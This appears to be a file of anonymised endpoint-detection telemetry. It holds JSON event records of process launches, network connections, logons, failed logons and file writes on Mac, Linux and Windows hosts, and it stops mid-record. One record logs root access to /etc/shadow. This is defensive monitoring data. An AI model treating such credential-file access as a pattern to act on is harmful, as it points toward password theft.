+{"event_simpleName":"ELFFileWritten","ContextTimeStamp":"1625677526.828","ConfigStateHash":"1620585913","ContextProcessId":"363122200934575406","Size":"38798952","ContextThreadId":"0","aip":"67.43.156.14","SHA256HashData":"35e590a61d32b72651b0cd23594d04f4671d79a843106136cf6abc324cc19027","FileIdentifier":"040000010000000000000000000000006793f80200000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"ELFFileWrittenMacV1","id":"ffffffff-1111-11eb-985c-02152dd35bc1","ELFSubType":"4","EffectiveTransmissionClass":"2","aid":"ffffffff28414c2293e35c360213e723","timestamp":"1625677527114","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/folders/3c/z7j1h7dx3nz3xkl10c1vyxgh0000gp/T/.com.google.Chrome.M2zGjQ/_platform_specific/x86-64/zoom_x86_64.nexe"} +{"MajorVersion":"4","event_simpleName":"OsVersionInfo","OSVersionFileData":"4e414d453d22416d617a6f6e204c696e7578220a56455253494f4e3d2232220a49443d22616d7a6e220a49445f4c494b453d2263656e746f73207268656c206665646f7261220a56455253494f4e5f49443d2232220a5052455454595f4e414d453d22416d617a6f6e204c696e75782032220a414e53495f434f4c4f523d22303b3333220a4350455f4e414d453d226370653a322e333a6f3a616d617a6f6e3a616d617a6f6e5f6c696e75783a32220a484f4d455f55524c3d2268747470733a2f2f616d617a6f6e6c696e75782e636f6d2f220a","BootArgs":"BOOT_IMAGE\u003d/boot/vmlinuz-4.14.232-176.381.amzn2.x86_64 root\u003dUUID\u003d9f548782-8f9f-4dd9-873a-436ea8f3e8a6 ro console\u003dtty0 console\u003dttyS0,115200n8 net.ifnames\u003d0 biosdevname\u003d0 nvme_core.io_timeout\u003d4294967295 rd.emergency\u003dpoweroff rd.shell\u003d0","ConfigStateHash":"3712162471","AgentVersion":"6.19.11611.0","aip":"67.43.156.14","MinorVersion":"14","OSVersionString":"Linux localhost 4.14.232-176.381.amzn2.x86_64 #1 SMP Wed May 19 00:31:54 UTC 2021 
x86_64","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","name":"OsVersionInfoLinV4","RFMState":"1","id":"ffffffff-1111-11eb-93d4-0624c36f3a79","OSVersionFileName":"/etc/os-release","aid":"ffffffff2d1245c0a32d5efcf9351272","timestamp":"1625677383466","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"event_simpleName":"CriticalFileModified","ContextTimeStamp":"1625677439.099","GID":"0","ConfigStateHash":"3090255842","ContextProcessId":"364849347227309005","ContextThreadId":"0","aip":"67.43.156.13","FileIdentifier":"04000001000000000000000000000000cdf3100100000000","ConfigBuild":"1007.4.0013701.1","UID":"0","USN":"89566685","event_platform":"Mac","UnixMode":"384","Entitlements":"15","name":"CriticalFileModifiedMacV2","id":"ffffffff-1111-11eb-9262-0268ab613b49","EffectiveTransmissionClass":"2","aid":"ffffffff761b4a7d9962dd9e7e776044","timestamp":"1625677439398","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/db/dslocal/nodes/Default/users/user9.plist/"} +{"event_simpleName":"NeighborListIP6","ConfigStateHash":"3090255842","NeighborList":"1C-AB-C0-9B-10-A2|2607:fea8:720:1bc8:1eab:c0ff:fe9b:10a2|0|","aip":"67.43.156.14","InterfaceIndex":"6","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"NeighborListIP6MacV1","id":"ffffffff-1111-11eb-ac8a-06b5e1186139","EffectiveTransmissionClass":"3","aid":"ffffffff01c7450180352a7c58a28fb4","timestamp":"1625677489786","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 
+{"event_simpleName":"NewScriptWritten","ContextTimeStamp":"1625677382.785","UserName":"user3","ConfigStateHash":"1325353086","ContextProcessId":"364952259879648742","Size":"8052","ContextThreadId":"0","aip":"67.43.156.14","SHA256HashData":"359fd6e9a46f605d491225325125502ca6ba99a73ac3141f59af96627f128fc6","FileIdentifier":"04000001000000000000000000000000ef07570000000000","ConfigBuild":"1007.4.0013806.1","event_platform":"Mac","IsOnRemovableDisk":"0","Entitlements":"15","name":"NewScriptWrittenMacV3","id":"ffffffff-1111-11eb-9dc1-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffffcebd42c0890d59b54279d3d3","timestamp":"1625677383057","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Users/user3/git/it_eng_scripts/depnotify_starter/dep_notify_starter.sh"} +{"event_simpleName":"SystemCapacity","ConfigStateHash":"1620585913","aip":"67.43.156.13","CpuClockSpeed":"2400000000","PhysicalCoreCount":"8","CpuFeaturesMask":"7494065083908067","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LogicalCoreCount":"16","Entitlements":"15","name":"SystemCapacityMacV1","CpuVendor":"0","CpuProcessorName":"Intel(R) Core(TM) i9-9980HK CPU @ 2.40GHz","id":"ffffffff-1111-11eb-b714-066001392751","CpuSignature":"591597","EffectiveTransmissionClass":"3","aid":"fffffffff2c7432859ff6bbe1a0bd6af","ProcessorPackageCount":"1","MemoryTotal":"17179869184","timestamp":"1625677387216","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 
+{"event_simpleName":"FirmwareAnalysisStatus","ConfigStateHash":"3090255842","FirmwareAnalysisEclControlInterfaceVersion":"0","aip":"67.43.156.14","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","FirmwareAnalysisEclConsumerInterfaceVersion":"0","BootTimeFunctionalityLevel":"255","ReasonOfFunctionalityLevel":"3","CurrentFunctionalityLevel":"2","Entitlements":"15","name":"FirmwareAnalysisStatusMacV2","id":"ffffffff-1111-11eb-ba57-0214a0d89bf7","EffectiveTransmissionClass":"0","aid":"ffffffff0d7b4d839912e55b4755e85b","timestamp":"1625677368429","cid":"ffffffff15754bcfb5f9152ec7ac90ac","PciAttachmentState":"65535"} +{"OutOctets":"0","CreationTimeStamp":"","aip":"67.43.156.13","OutMulticastPkts":"0","InErrors":"0","InterfaceAlias":"utun2","InDiscards":"0","InterfaceIndex":"17","event_platform":"Mac","InterfaceType":"1","id":"ffffffff-1111-11eb-a272-0294ad12fbe7","PhysicalAddressLength":"0","InUcastPkts":"0","EffectiveTransmissionClass":"2","timestamp":"1625677504544","LocalAddressIP4":"67.43.156.14","event_simpleName":"LocalIpAddressIP4","ConfigStateHash":"3090255842","PhysicalAddress":"","OutErrors":"0","InUnknownProtos":"0","OutUcastPkts":"0","InMulticastPkts":"0","ConfigBuild":"1007.4.0013701.1","InOctets":"0","NetLuidIndex":"2","Entitlements":"15","name":"LocalIpAddressIP4MacV1","aid":"ffffffff557f4b99a0afdea9ce8cd6fa","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} +{"CommandLine":"uname 
-a","ConfigBuild":"1007.8.0009806.1","ConfigStateHash":"4288861242","Entitlements":"15","GID":"0","ImageFileName":"/bin/uname","MD5HashData":"894356eb59e279696c304f07091b7fde","NDRoot":"321385814512398584","ParentProcessId":"321385814512398584","ProcessEndTime":"1604855099.126","ProcessGroupId":"0","ProcessStartTime":"1604855099.126","RGID":"0","RUID":"0","RawProcessId":"51342","SHA1HashData":"0000000000000000000000000000000000000000","SHA256HashData":"de80fe0bd06a96543aaec5c634b08cbfc58dba88ea3a66871434a0dd3a9e9dfa","SVGID":"0","SVUID":"0","SessionProcessId":"314116638974342642","SourceProcessId":"321385814512398584","SourceThreadId":"0","TargetProcessId":"321385814512398605","UID":"0","aid":"ffffffff70d140ca9ba97f0dddd14137","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Lin","event_simpleName":"ProcessRollup2","id":"ffffffff-1111-11eb-ac87-06decddc17a1","name":"ProcessRollup2LinV5","timestamp":"1604855099681"} +{"AsepWrittenCount":"0","ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"1789338890","ContextProcessId":"317713210176499254","ContextThreadId":"0","ContextTimeStamp":"1604855096.730","DirectoryCreatedCount":"0","DnsRequestCount":"0","Entitlements":"15","ExecutableDeletedCount":"0","FileDeletedCount":"0","NetworkBindCount":"0","NetworkCapableAsepWriteCount":"0","NetworkCloseCount":"0","NetworkConnectCount":"0","NetworkListenCount":"0","NetworkRecvAcceptCount":"0","NewExecutableWrittenCount":"0","RawProcessId":"28987","SHA256HashData":"6de76ab470a16b2a825d223b996d994623473c694c60fccbb71af8691e61c5e0","SuspectStackCount":"0","SuspiciousDnsRequestCount":"0","TargetProcessId":"317713210176499254","aid":"ffffffff75fc48f15cfe5f095e605c4c","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"EndOfProcess","id":"ffffffff-1111-11eb-809e-02fff4e55a49","name":"EndOfProcessMacV14","timestamp":"1604855099646"} 
+{"AllocateVirtualMemoryCount":"0","ArchiveFileWrittenCount":"0","AsepWrittenCount":"0","BinaryExecutableWrittenCount":"0","CLICreationCount":"0","ConHostId":"38188","ConHostProcessId":"3099352216141","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3343111420","ContextData":"","ContextProcessId":"3100508103359","ContextThreadId":"93436292950223","ContextTimeStamp":"1604855097.926","CreateProcessCount":"0","CycleTime":"2937514388","DirectoryCreatedCount":"0","DirectoryEnumeratedCount":"1","DnsRequestCount":"0","DocumentFileWrittenCount":"0","EffectiveTransmissionClass":"3","Entitlements":"15","ExeAndServiceCount":"0","ExecutableDeletedCount":"0","ExitCode":"0","FileDeletedCount":"2","GenericFileWrittenCount":"0","ImageSubsystem":"3","InjectedDllCount":"0","InjectedThreadCount":"0","KernelTime":"7500000","MaxThreadCount":"4","ModuleLoadCount":"38","NetworkBindCount":"0","NetworkCapableAsepWriteCount":"0","NetworkCloseCount":"0","NetworkConnectCount":"0","NetworkConnectCountUdp":"0","NetworkListenCount":"0","NetworkModuleLoadCount":"0","NetworkRecvAcceptCount":"0","NewExecutableWrittenCount":"0","ParentProcessId":"3099350649383","PrivilegedProcessHandleCount":"0","ProcessStartTime":"1604855096.463","ProtectVirtualMemoryCount":"0","QueueApcCount":"0","RawProcessId":"33016","RegKeySecurityDecreasedCount":"0","RemovableDiskFileWrittenCount":"0","RunDllInvocationCount":"0","SHA256HashData":"faceb6f5d1cdc5ad50a4a1b92c4cd3fcdabcf7e8d418014a1b1221c1defa3d8f","ScreenshotsTakenCount":"0","ScriptEngineInvocationCount":"0","ServiceEventCount":"0","SetThreadContextCount":"0","SnapshotFileOpenCount":"0","SuspectStackCount":"0","SuspiciousCredentialModuleLoadCount":"0","SuspiciousDnsRequestCount":"0","SuspiciousFontLoadCount":"0","SuspiciousRawDiskReadCount":"0","TargetProcessId":"3100508103359","UnsignedModuleLoadCount":"0","UserMemoryAllocateExecutableCount":"0","UserMemoryAllocateExecutableRemoteCount":"0","UserMemoryProtectExecutableCount":"0","UserMemoryProtectExecutableRem
oteCount":"0","UserSid":"S-1-5-18","UserTime":"6406250","aid":"ffffffffb5db4b2e7ec89aba537adcc2","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"EndOfProcess","id":"ffffffff-1111-11eb-8726-063418e4a9e7","name":"EndOfProcessV15","timestamp":"1604855099935"} +{"AsepWrittenCount":"0","ConfigBuild":"1007.4.0009304.1","ConfigStateHash":"3344040805","ContextProcessId":"311775981885093125","ContextThreadId":"0","ContextTimeStamp":"1604855101.341","DirectoryCreatedCount":"0","DnsRequestCount":"0","Entitlements":"15","ExecutableDeletedCount":"0","FileDeletedCount":"0","NetworkBindCount":"0","NetworkCapableAsepWriteCount":"0","NetworkCloseCount":"0","NetworkConnectCount":"0","NetworkListenCount":"0","NetworkRecvAcceptCount":"0","NewExecutableWrittenCount":"0","RawProcessId":"10507","SHA256HashData":"3b00897e1eb587c5f77e3866ff6bdc80f5e70f839543242e0ee5a1581014adc3","SuspectStackCount":"0","SuspiciousDnsRequestCount":"0","TargetProcessId":"311775981885093125","aid":"ffffffff1aa0482a5ea94f64e08e7b15","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"EndOfProcess","id":"ffffffff-1111-11eb-bc03-065126dd0691","name":"EndOfProcessMacV12","timestamp":"1604855100139"} +{"AuthenticationId":"999","CommandLine":"D:\\projects\\splunk-forwarder\\bin\\splunk-powershell.exe 
--ps2","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3765958535","EffectiveTransmissionClass":"3","Entitlements":"15","ImageFileName":"\\Device\\HarddiskVolume2\\projects\\splunk-forwarder\\bin\\splunk-powershell.exe","ImageSubsystem":"3","IntegrityLevel":"16384","MD5HashData":"571391f723a439e985a2064337e2802a","ParentAuthenticationId":"999","ParentBaseFileName":"splunkd.exe","ParentProcessId":"17346335177","ProcessCreateFlags":"67634688","ProcessEndTime":"","ProcessParameterFlags":"24577","ProcessStartTime":"1604855099.406","ProcessSxsFlags":"64","RawProcessId":"6116","SHA1HashData":"0000000000000000000000000000000000000000","SHA256HashData":"7f326aad0ee45bfef93daede5597d70422d472084ae3295762654fb5021a8720","SessionId":"0","SourceProcessId":"17346335177","SourceThreadId":"107650023406","Tags":"27, 151, 12094627905582, 12094627906234","TargetProcessId":"583707537390","TokenType":"1","UserSid":"S-1-5-18","WindowFlags":"384","aid":"ffffffff3a5a424fa02450da53619745","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"ProcessRollup2","id":"ffffffff-1111-11eb-a09e-06f79d630255","name":"ProcessRollup2V17","timestamp":"1604855100030"} +{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"2784638081","ContextProcessId":"259090530891","ContextThreadId":"16409623709004","ContextTimeStamp":"1604855095.961","DnsRequestCount":"1","DomainName":"comp1.dom2","DualRequest":"0","EffectiveTransmissionClass":"3","Entitlements":"15","InterfaceIndex":"0","RequestType":"1","aid":"ffffffff4f1444bab96568879cb43556","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"DnsRequest","id":"ffffffff-1111-11eb-8077-0606f7dcf2ed","name":"DnsRequestV3","timestamp":"1604855099913"} 
+{"ConfigBuild":"1007.8.0009806.1","ConfigStateHash":"4288861242","ContextProcessId":"321385820045701199","ContextThreadId":"0","ContextTimeStamp":"1604855101.645","Entitlements":"15","GID":"0","TargetFileName":"/etc/shadow","UID":"0","UnixMode":"32768","aid":"ffffffff32ba43a483e76c6f0a4aa26f","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Lin","event_simpleName":"CriticalFileAccessed","id":"ffffffff-1111-11eb-b70d-027f9ced2001","name":"CriticalFileAccessedLinV1","timestamp":"1604855102247"} +{"CommandLine":"/usr/bin/plutil -convert xml1 -o - /Applications/Xcode.app/Contents/Developer/Platforms/AppleTVOS.platform/Developer/Library/CoreSimulator/Profiles/Runtimes/tvOS.simruntime/Contents/Resources/RuntimeRoot/System/Library/PrivateFrameworks/DiagnosticExtensions.framework/PlugIns/com.apple.DiagnosticExtensions.CrashLogs.appex/Info.plist","ConfigBuild":"1007.4.0009304.1","ConfigStateHash":"3344040805","Entitlements":"15","GID":"0","ImageFileName":"/usr/bin/plutil","MD5HashData":"d51cef1b288e2032aee9805deff04bfd","MachOSubType":"1","ParentProcessId":"311774817965726568","ProcessEndTime":"","ProcessGroupId":"311774817965726568","ProcessStartTime":"1604855111.240","RGID":"0","RUID":"0","RawProcessId":"10692","SHA1HashData":"0000000000000000000000000000000000000000","SHA256HashData":"3b00897e1eb587c5f77e3866ff6bdc80f5e70f839543242e0ee5a1581014adc3","SVGID":"0","SVUID":"0","SourceProcessId":"311776004953765502","SourceThreadId":"0","Tags":"27, 12094627905582, 12094627906234","TargetProcessId":"311776004953765502","UID":"0","aid":"ffffffff1aa0482a5ea94f64e08e7b15","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"ProcessRollup2","id":"ffffffff-1111-11eb-bc03-065126dd0691","name":"ProcessRollup2MacV3","timestamp":"1604855109180"} 
+{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3899738370","ContextProcessId":"1546527409909","ContextThreadId":"4711690090889","ContextTimeStamp":"1604855114.133","DesiredAccess":"1180054","EffectiveTransmissionClass":"3","Entitlements":"15","FileAttributes":"0","FileIdentifier":"501ee2c32e53fb43b07f419f3236fb45c29e000000002c00","FileObject":"18446655033844205120","Information":"2","IrpFlags":"2180","MajorFunction":"0","MinorFunction":"0","OperationFlags":"0","Options":"88080484","ShareAccess":"1","Status":"0","TargetFileName":"\\Device\\HarddiskVolume4\\Windows\\Temp\\__PSScriptPolicyTest_dvkjnbka.apn.ps1","aid":"ffffffff8f1e4b77b4dae5debaa1c8bc","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NewScriptWritten","id":"ffffffff-1111-11eb-80b5-06e11a66e03d","name":"NewScriptWrittenV7","timestamp":"1604855114427"} +{"ConfigBuild":"1007.4.0012205.1","ConfigStateHash":"1306766522","ConnectionDirection":"1","ConnectionFlags":"0","ContextProcessId":"321275232072440993","ContextTimeStamp":"1604855116.421","Entitlements":"15","InContext":"0","LocalAddressIP4":"0.0.0.0","LocalPort":"0","Protocol":"6","RemoteAddressIP4":"67.43.156.14","RemotePort":"443","aid":"ffffffffd4094240a6b1d12aaf304f4f","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"NetworkConnectIP4","id":"ffffffff-1111-11eb-aca9-02683aed2a0d","name":"NetworkConnectIP4MacV5","timestamp":"1604855116502"} 
+{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"2602391615","ConnectionDirection":"0","ConnectionFlags":"0","ContextProcessId":"223442259384","ContextTimeStamp":"1604855116.849","EffectiveTransmissionClass":"3","Entitlements":"15","InContext":"0","LocalAddressIP4":"67.43.156.14","LocalPort":"53961","Protocol":"6","RemoteAddressIP4":"67.43.156.14","RemotePort":"443","aid":"fffffffff000426eb99afaa2ccdcbc17","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NetworkConnectIP4","id":"ffffffff-1111-11eb-b0eb-06be7616c211","name":"NetworkConnectIP4V5","timestamp":"1604855116942"} +{"AuthenticationId":"6580764513","AuthenticationPackage":"Negotiate","ClientComputerName":"-","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3011122681","ContextProcessId":"816054990879","ContextThreadId":"52913017705957","ContextTimeStamp":"1604855091.781","EffectiveTransmissionClass":"2","Entitlements":"15","LogonDomain":"NT AUTHORITY","LogonServer":"","LogonTime":"1604855091.781","LogonType":"9","PasswordLastSet":"","RemoteAccount":"1","UserFlags":"0","UserIsAdmin":"0","UserLogonFlags":"12","UserName":"SYSTEM","UserPrincipal":"user4@dom2","UserSid":"S-1-5-18","aid":"ffffffff8d2e4b4f9b21b40633a8d579","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"UserLogon","id":"ffffffff-1111-11eb-a8cf-0649c95cfa1d","name":"UserLogonV8","timestamp":"1604855121077"} 
+{"AuthenticationId":"2007206396","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3011122681","ContextProcessId":"4415814628770","ContextThreadId":"41392001729898","ContextTimeStamp":"1604855120.785","DiskParentDeviceInstanceId":"PCI\\VEN_1000\u0026DEV_0054\u0026SUBSYS_197615AD\u0026REV_01\\4\u00261f16fef7\u00260\u002600A8","EffectiveTransmissionClass":"3","Entitlements":"15","FileEcpBitmask":"0","FileIdentifier":"b57cb59769dfe71180b4806e6f6e6963ea8902000000cb2c","FileObject":"18446708893089967904","IrpFlags":"1028","IsOnNetwork":"0","IsOnRemovableDisk":"0","IsTransactedFile":"0","MajorFunction":"18","MinorFunction":"0","OperationFlags":"0","SHA256HashData":"d0e1b81f3f3f18256f6447703624019eaee9b1068b3f09323eced4f547cc4182","Size":"6144","TargetFileName":"\\Device\\HarddiskVolume2\\Users\\user10\\AppData\\Local\\Temp\\ec1ijefl.dll","TokenType":"1","aid":"ffffffff2c47454cba360bc404a607bb","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"PeFileWritten","id":"ffffffff-1111-11eb-b091-06f6cca0a049","name":"PeFileWrittenV14","timestamp":"1604855121109"} +{"AuthenticationId":"317005428","AuthenticationPackage":"Negotiate","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3950066843","EffectiveTransmissionClass":"2","Entitlements":"15","LogoffTime":"1604855132.756","LogonDomain":"dom1","LogonServer":"srv2","LogonTime":"1604855131.666","LogonType":"7","PasswordLastSet":"1598119332.510","RemoteAccount":"1","UserFlags":"32","UserIsAdmin":"0","UserLogoffType":"3","UserLogonFlags":"0","UserName":"user4","UserPrincipal":"user.name@dom2.com","UserSid":"S-1-5-21-606747145-1364589140-725345543-28636","aid":"ffffffffe0104823bd3de859d5bc8bc7","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"UserLogoff","id":"ffffffff-1111-11eb-8913-0287fd11c79b","name":"UserLogoffV3","timestamp":"1604855134461"} 
+{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"537307300","ContextProcessId":"635780922149","ContextThreadId":"9479299143023","ContextTimeStamp":"1604855025.966","DesiredAccess":"1180054","EffectiveTransmissionClass":"3","Entitlements":"15","FileAttributes":"128","FileIdentifier":"0e02a8c7ed9d244887cef0409af0e6190030000000001100","FileObject":"18446695174291796544","Information":"2","IrpFlags":"2180","MajorFunction":"0","MinorFunction":"0","OperationFlags":"0","Options":"83886176","ShareAccess":"3","Status":"0","TargetFileName":"\\Device\\HarddiskVolume4\\Program Files\\Snow Software\\Inventory\\Agent\\cloudmeteringhost.exe","aid":"ffffffff425942f58382dbb11350eeda","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NewExecutableWritten","id":"ffffffff-1111-11eb-93cb-067deb43537b","name":"NewExecutableWrittenV1","timestamp":"1604855149643"} +{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3765958535","ConnectionDirection":"2","ConnectionFlags":"0","ContextProcessId":"50714198593318","ContextThreadId":"194302491825207","ContextTimeStamp":"1604855150.066","EffectiveTransmissionClass":"3","Entitlements":"15","InContext":"0","LocalAddressIP4":"127.0.0.1","LocalPort":"59491","Protocol":"6","RemoteAddressIP4":"0.0.0.0","RemotePort":"0","aid":"ffffffffa51b4acf9dbc1fc273e6145c","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NetworkListenIP4","id":"ffffffff-1111-11eb-8726-063418e4a9e7","name":"NetworkListenIP4V5","timestamp":"1604855150545"} 
+{"ClientComputerName":"com1","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3011122681","ContextProcessId":"7073822473144","ContextThreadId":"48689911139327","ContextTimeStamp":"1604855152.993","EffectiveTransmissionClass":"2","Entitlements":"15","EtwRawProcessId":"744","EtwRawThreadId":"5304","LogonDomain":"BROADCAST","LogonType":"3","RemoteAddressIP4":"67.43.156.14","Status":"3221225581","SubStatus":"3221225578","UserName":"user5","aid":"ffffffffd8844a59acce5e1f4ad01888","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"UserLogonFailed2","id":"ffffffff-1111-11eb-a8aa-067029dffccb","name":"UserLogonFailed2V2","timestamp":"1604855154274"} +{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3343111420","ContextProcessId":"1838383212125","ContextThreadId":"27242382481217","ContextTimeStamp":"1604855151.534","EffectiveTransmissionClass":"3","Entitlements":"15","FileIdentifier":"b0754a8f86feffffb0754a8f86feffff09764a8f86feffff","FileObject":"18446636884348143072","IrpFlags":"1028","MajorFunction":"18","MinorFunction":"0","OperationFlags":"0","TargetFileName":"\\Device\\HarddiskVolume3\\Program Files\\WindowsApps\\Deleted\\Microsoft.Getstarted_9.10.32461.0_x64__8wekyb3d8bbweacf6b996-01b3-402c-bd01-a67529f94699\\clrcompression.dll","aid":"ffffffff4a0946365161093453e596d4","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"ExecutableDeleted","id":"ffffffff-1111-11eb-b23b-064dea059649","name":"ExecutableDeletedV3","timestamp":"1604855154670"} 
+{"AsepWrittenCount":"0","ConfigBuild":"1007.4.0009202.1","ConfigStateHash":"230795414","ContextProcessId":"318137549555284836","ContextThreadId":"0","ContextTimeStamp":"1604855135.209","DirectoryCreatedCount":"0","DnsRequestCount":"0","Entitlements":"15","ExecutableDeletedCount":"0","FileDeletedCount":"0","NetworkBindCount":"0","NetworkCapableAsepWriteCount":"0","NetworkCloseCount":"0","NetworkConnectCount":"0","NetworkListenCount":"0","NetworkRecvAcceptCount":"0","NewExecutableWrittenCount":"0","RawProcessId":"20195","SHA256HashData":"295fbc2356e8605e804f95cb6d6f992335e247dbf11767fe8781e2a7f889978a","SuspectStackCount":"0","SuspiciousDnsRequestCount":"0","TargetProcessId":"318137549555284836","aid":"ffffffffcfe84e8c6a52c4001bd83761","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"EndOfProcess","id":"ffffffff-1111-11eb-ae31-065d76bec0c3","name":"EndOfProcessMacV11","timestamp":"1604855160047"} +{"ApiReturnValue":"1","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","ContextProcessId":"683078218537","ContextTimeStamp":"1604855171.731","EffectiveTransmissionClass":"3","Entitlements":"15","EtwRawProcessId":"19400","EtwRawThreadId":"9384","aid":"ffffffff80984ea8b49d9a53f590c566","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"RegisterRawInputDevicesEtw","id":"ffffffff-1111-11eb-a570-0685ba2a382f","name":"RegisterRawInputDevicesEtwV1","timestamp":"1604855173077"} 
+{"CompletionEventId":"Event_ChannelDataDownloadCompleteV1","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","DownloadPath":"metahash+/cfs/channelfiles/0000000013/b2acba1a30a3407dae27d0503611022d/C-00000013-00000000-00000408.sys","DownloadPort":"443","DownloadServer":"lfodown01-b.cloudsink.net","EffectiveTransmissionClass":"0","Entitlements":"15","TargetFileName":"C-00000013-00000000-00000408.sys","aid":"ffffffffffc94c645268f64fc900213f","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"LFODownloadConfirmation","id":"ffffffff-1111-11eb-8ab5-0643392fc75d","name":"LFODownloadConfirmationV1","timestamp":"1604855174018"} +{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"1763245019","ContextProcessId":"2071361595421","ContextThreadId":"41650430047375","ContextTimeStamp":"1604855146.590","EffectiveTransmissionClass":"3","Entitlements":"15","FileIdentifier":"4b0121a43dfc1f4ca54eea679ddbcd4eef2103000000ca00","FileObject":"18446622606546437424","IrpFlags":"395312","MajorFunction":"6","MinorFunction":"0","NewFileIdentifier":"4b0121a43dfc1f4ca54eea679ddbcd4eef2103000000ca00","OperationFlags":"0","SourceFileName":"\\Device\\HarddiskVolume3\\Windows\\assembly\\temp\\EKA0UARWWK\\Microsoft.WSMan.Management.ni.dll","TargetFileName":"\\Device\\HarddiskVolume3\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.We0722664#\\c2579d00f9849413b8b7948dd00ac863\\Microsoft.WSMan.Management.ni.dll","aid":"ffffffff280b41b956a91e816bd9b9b0","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NewExecutableRenamed","id":"ffffffff-1111-11eb-8162-0663305b686f","name":"NewExecutableRenamedV6","timestamp":"1604855177513"} 
+{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"402097454","ContextProcessId":"66601077523","ContextThreadId":"2500785639062","ContextTimeStamp":"1604855165.213","DesiredAccess":"1048577","EffectiveTransmissionClass":"3","Entitlements":"15","FileAttributes":"128","FileIdentifier":"d2f4250ff1ba3b4ca66e123c5269884ca6f8020000002700","FileObject":"18446641334185168032","Information":"2","IrpFlags":"2180","MajorFunction":"0","MinorFunction":"0","OperationFlags":"0","Options":"35668001","ShareAccess":"3","Status":"0","TargetFileName":"\\Device\\HarddiskVolume3\\Windows\\CbsTemp\\30848497_1904507751\\FodWU","aid":"ffffffff2c9f4066b0b5f2f00265503c","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"DirectoryCreate","id":"ffffffff-1111-11eb-9411-06b7c99be087","name":"DirectoryCreateV1","timestamp":"1604855180332"} +{"AuthenticationId":"999","CommandLine":"C:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s 